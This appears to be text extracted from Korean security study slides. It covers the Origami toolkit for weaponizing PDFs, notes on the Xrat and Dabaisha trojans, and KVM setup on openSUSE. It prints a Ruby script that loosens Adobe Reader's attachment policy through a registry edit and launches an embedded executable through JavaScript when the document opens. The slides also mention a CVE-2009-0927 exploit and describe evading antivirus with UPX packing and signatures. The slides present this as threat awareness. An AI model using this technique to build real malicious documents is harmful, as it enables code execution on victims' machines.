http://www.security-lab.org/origami/ Ruby 로개발됨 PDF 파일에악성프로그램을쉽게추가
%PDF-1.0 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj 2 0 obj << /Type /Pages /Count 1 /Kids [ 3 0 R ] >> endobj 3 0 obj << >> endobj /Type /Page /Resources << /Font << /F1 << >> >> >> /Parent 2 0 R /MediaBox [ 0 0 795 842 ] /Contents 4 0 R /Type /Font /BaseFont /Helvetica /Subtype /Type1 /Name /F1
4 0 obj << /Length 55 >>stream BT /F1 15 Tf 350 750 Td 20 TL 1 Tr (I am Simple) Tj ET endstream endobj xref 0 5 0000000000 65535 f 0000000010 00000 n 0000000067 00000 n 0000000136 00000 n 0000000373 00000 n trailer << /Root 1 0 R /Size 5 >> startxref 485 %%EOF
simple.rb
script.rb
launch.rb
Stream : 모든데이터를 Stream 으로표현 텍스트, 다른파일, 비디오, 이미지등포함 Filter : 데이터표현법 ASCIIHexDecode ASCII85Decode LZWDecode FlateDecode RunLengthDecode CCITTFaxDecode JBIG2Decode DCTDecode JPXDecode
out.rb
Filter 적용
script2.rb
eicar.com 첨부
#!/usr/bin/ruby $: << "../parser" require 'parser.rb' include Origami params = Action::Launch::WindowsLaunchParams.new params.f = "reg.exe" #params.d = "C:\\Windows\\system32" params.p = "add \"HKLM\\SOFTWARE\\Policies\\Adobe\\Acrobat Reader\\9.0\\FeatureLockDown\\cDefaultLaunchAttachmentPerms\" /v tbuiltinpermlist /d \"version:1.exe:2.pdf:2\" /f" action = Action::Launch.new action.win = params
jscript = <<EOS try { this.exportdataobject({ cname: "calc.exe", nlaunch: 2 }); } catch(e) { app.alert({cmsg:"[line "+e.linenumber+"] "+e.tostring(), ctitle: e.name, nicon: 0}); } EOS
jsaction = Action::JavaScript.new(Stream.new( jscript)) pdf = PDF.read( "simple.pdf" ) attachment = pdf.attach_file("calc.exe", :EmbededName => "calc.exe") pdf.ondocumentopen(action) annot = Annotation::FileAttachment.new({:Name => Annotation::FileAttachment::Icons::PAPERCLIP, :FS => attachment}) annot.contents = "This contains an embedded file called: 'calc.exe'" annot.rect = [ 24, 600, 36, 616 ] pdf.pages.first.add_annot(annot) pdf.pages.first.onopen( jsaction) pdf.saveas("embed_calc_reader_9.pdf")
cve-2009-0927-geticon.rb Adobe Reader and Adobe Acrobat Professional < 8.1.4 사용자확인없이명령실행가능 http://www.zerodayinitiative.com/advisories
Origami 를이용하여 PDF 파일에파일첨부및첨부된파일실행가능 PDF 파일에의한보안위협확인 PDF Reader 최신버젼업데이트
Xrat Rootkit 형트로이목마 Dabaisha 조종서버정보를 2개입력가능 UPX로패킹한트로이목마생성 특이한기능제공
현재백신에검출됨
프로그램에디지털서명추가 사용자확인우회
웹캠켜기 스크린끄기 화면글쓰기 윈도우창제어
별도의시그너쳐존재하지않음
Xrat 트로이목마는은닉기능이있으나다른기능들이미약 Dabaisha 트로이목마는다양한기능제공, UPX 로패킹된파일을검출하지못한백신존재
리눅스커널에포함된첫번째가상화기법 코드의재사용 리눅스의일부이므로 host와 guest 동일 Intel VT 및 AMD-V의 VMX 지원 반드시 CPU에서 VMX가지원되어야사용가능 커널모듈 kvm.ko, kvm-intel.ko or kvm-amd.ko 사용자영역프로그램 QEMU
장점 Linux Kernel의업데이트로인한성능향상 VMX를사용하므로코드량이작음 Guest OS가하나의프로세스 (Linux 명령사용가능 ) Simple hosted virtualization 단점 Guest OS는 2040 이상의메모리를사용할수없음 안정화되고있는단계
Virtual Machine Extensions (VMX) 라불리는확장인스트럭션제공 MultiTasking HyperThreading Virtualization
Guests are scheduled as regular processes kill(1), top(1) work as expected Guest physical memory is mapped into the task's virtual memory space
KVM Part of Linux Linux scheduler, memory management Minimal impact No support for paravirtualiztion Under development Xen External hypervisor Own scheduler, memory management Intrusive Supports paravirtualization Fairly mature
Linux : opensuse 11.2 AQEMU : 0.7.3
cat /proc/cpuinfo Intel : vmx, AMD : svm 확인 BIOS 의 Advanced Processor 옵션 Intel : Intel(R) Virtualization Technology => Enable
KVM 설치 zypper install kvm QEMU 설치 zypper install qemu 커널모듈적재 (/dev/kvm 생성됨 ) modprobe kvm modprobe kvm-intel AQEMU 설치 http://sourceforge.net/projects/aqemu/files/ tar xjvpf aqemu-0.7.3-bin-static-qt-linux-32bit.tar.bz2 -C /
일반유저로로그인후 aqemu 실행
VT 기능이지원되는 CPU 에서만사용가능 일반 PC 나노트북에서는사용이불가능 Bridge 네트워크기능설정이용이하지않음 바로실무에적용하기에는많은테스트필요함